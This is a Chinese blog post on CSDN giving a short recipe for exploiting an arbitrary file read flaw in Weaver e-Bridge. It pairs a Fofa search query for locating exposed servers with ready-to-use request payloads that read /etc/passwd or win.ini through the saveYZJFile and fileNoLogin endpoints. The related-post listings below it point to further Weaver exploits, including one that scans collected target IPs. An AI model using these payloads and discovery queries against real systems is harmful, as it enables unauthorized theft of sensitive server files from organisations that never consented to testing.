泛微云桥e-Bridge-任意文件读取漏洞

最新推荐文章于 2024-02-10 19:47:58 发布
最新推荐文章于 2024-02-10 19:47:58 发布
阅读量6.4k 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36197704/article/details/108980426
版权

1.资产查找

Fofa: title="泛微云桥 e-Bridge"

2.漏洞描述

泛微云桥e-Bridge存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。

3.漏洞复现

1)Linux服务器

(1)在URL后添加payload

payload:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt

(2)在URL后添加/file/fileNoLogin/上一步返回的id

payload:/file/fileNoLogin/fa38f21af951482bb450d1ce3e6a7b49

2)Windows服务器

(1)在URL后添加payload

payload :/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C://windows/win.ini&fileExt=txt

(2)在URL后添加/file/fileNoLogin/上一步返回的id

payload:/file/fileNoLogin/9ecccbde436e4d3d8d34ef63274d4d4d

 

chaojixiaojingang
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
泛微-云桥e-Bridge SQL注入漏洞复现
0xSec
12-12 1399
由于泛微-云桥e-Bridge平台/taste/addTaste接口处存在SQL注入漏洞,未经身份认证的攻击者可以通过此漏洞获取数据库权限,获取用户密码等重要凭据,使系统处于极不安全状态。
漏洞复现】泛微OA E-Cology ln.FileDownload文件读取漏洞
晚风不及你
05-13 544
泛微OA E-Cology是一款面向中大型组织的数字化办公产品,它基于全新的设计理念和管理思想,旨在为中大型组织创建一个全新的高效协同办公环境。泛微OA E-Cology ln.FileDownload存在任意文件读取漏洞,允许未经授权的用户读取服务器上的敏感配置文件。Fofa-Query: app="泛微-OA(e-cology)"1.泛微OA E-Cology。2.漏洞POC详情见公众号文章。
2021-泛微OA V8 SQL注入漏洞
热门推荐
weixin_43227251的博客
04-13 1万+
泛微OA V8 SQL注入漏洞 漏洞描述 泛微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限 漏洞影响 泛微OA V8 FOFA app=“泛微-协同办公OA” 漏洞复现 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) : 方法处理 在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法 P
【复现】泛微云桥 e-Bridge SQL注入漏洞_45
fushuang333的博客
02-10 898
【复现】泛微云桥 e-Bridge SQL注入漏洞,攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
泛微e-Bridge未授权文件读取漏洞复现
The current road is different, love needs to distinguish between right and wrong
03-05 7467
简介 泛微云桥 e-Bridge 存在未经授权读取任意文件漏洞,可利用该漏洞,实现任意文件读取,获取敏感信息。 fofa title="泛微云桥e-Bridge" 漏洞复现 因为不是在本地搭建的漏洞复现环境,利用空间搜索引擎只找到很少量存在漏洞的网站,大多数都开启了身份验证,找到的也都是基于Windows的,所以就不在介绍Linux上搭建的了。 payload1 /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///
漏洞复现-泛微云桥 e-Bridge SQL注入(附漏洞检测脚本)
jjjj1029056414的博客
12-12 1258
漏洞复现-泛微云桥 e-Bridge SQL注入,附带自己写的poc脚本
泛微云桥e-Bridge任意文件读取
MD@@nr丫卡uer
11-28 3736
泛微云桥e-Bridge任意文件读取漏洞 0x00漏洞影响版本: 该漏洞几乎影响2018-2019全版本。 0x01漏洞利用: 默认密码sysadmin/1 fofa搜索语句:title=“泛微云桥” 主要成因 /wxjsapi/saveYZJFil接口获取filepath,返回数据包内出现了程序的绝对路径,攻击者可以下载相关敏感文件 构造如下语句 http://x.x.x.x/wxjsapi/saveYZJFile? fileName=test&downloadUrl=file:///etc/
泛微云桥 e-Bridge 任意文件读取.md
04-11
泛微云桥 e-Bridge 任意文件读取
泛微云桥e-Bridge安装手册
04-10
泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。截止自本手册编制之日e-Bridge已实现了腾讯微信及阿里钉钉开放接口的封装,企业可以...
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
泛微E-Office10远程代码执行漏洞
05-06
泛微E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上传的PHAR文件时存在的缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
泛微e-office短信插件_泛微短信接口开发_e-office短信发送设置
02-11
泛微e-office短信插件设置指南 在泛微e-office V10.0版本中,设置短信发送功能需要通过泛微短信接口进行开发。下面将详细介绍泛微e-office短信插件的设置步骤和泛微短信接口的开发过程。 一、泛微e-office短信插件...
泛微 E Bridge 云桥任意文件读取
nnn2188185的博客
03-25 1174
泛微云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。
漏洞情报-泛微云桥 e-Bridge addTaste接口SQL注入漏洞
qq_52612931的博客
01-02 649
由于泛微云桥e-Bridge平台addTaste接口存在SQL注入漏洞,未经身份认证的攻击者可以利用该漏洞获取数据库权限及数据库的敏感数据。3、其他内容不修改,然后放包后即可复现。
泛微云桥任意文件读取漏洞[尽快升级]
weixin_46137328的博客
09-12 1181
0x00 泛微云桥来不及解释了,看图用的人很多。0X01 漏洞验证/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///e...
python读取遍历data文件_泛微云桥目录遍历和文件读取
weixin_33514475的博客
01-27 218
Fofa: app="泛微-云桥e-Bridge"试了一下,目标挺多的,fofa搜到的第一个就存在漏洞,然后大部分软件装在windows系统上,极小部分安装在linux系统上,搜linux目标要限定系统app="泛微-云桥e-Bridge" && os="ubuntu"目录遍历和文件读取取决于downloadUrl参数/wxjsapi/saveYZJFile?fileNa...
泛微云桥任意文件读取漏洞复现[09/18]
weixin_39811856的博客
09-18 1356
1.老规矩,搜寻目标机器(xpath用起来确实很方便) 2.根据网上的POC试试: GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1 User-Agent: curl/7.29.0 Host: xxxxx Accept: */* 3.根据收集到的IP,手动是真滴麻烦,写个小脚本再筛选一遍: 发现这个好像有戏,没有/etc/passwd,并且还是
任意文件读取及删除漏洞
qq_50854662的博客
09-27 2089
任意文件读取漏洞及危害 通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件,正常读取文件没有经过校验或者不严格,用户可以控制这个变量读取任意文件任意文件读取漏洞,是web安全里高危的漏洞,...
泛微E-cology OA /weaver/ 代码执行漏洞
weixin_30343157的博客
09-22 1198
泛微E-cology OA /weaver/代码执行漏洞 泛微e-cology OA Beanshell组件远程代码执行 分析文章:https://dwz.cn/bYtnsKwa http://127.0.0.1/weaver/bsh.servlet.BshServlet 若存在如上页面,则用下面数据包进行测试。 POST /weaver/bsh.servl...
泛微e-bridge漏洞文件上传漏洞(CVE-2021-28368)
最新发布
05-25
泛微e-bridge是一款企业信息化平台,近期被曝存在文件上传漏洞(CVE-2021-28368),攻击者可以利用此漏洞上传恶意文件,进而控制服务器或者实施其他攻击行为。 该漏洞的原因是泛微e-bridge的上传功能没有对上传文件的类型进行严格限制,导致攻击者可以上传包含恶意脚本的文件,从而造成远程命令执行、文件读取等安全风险。 目前,该漏洞已被公开披露,并且泛微已经发布了安全补丁,建议用户尽快升级到最新版本以避免遭受攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值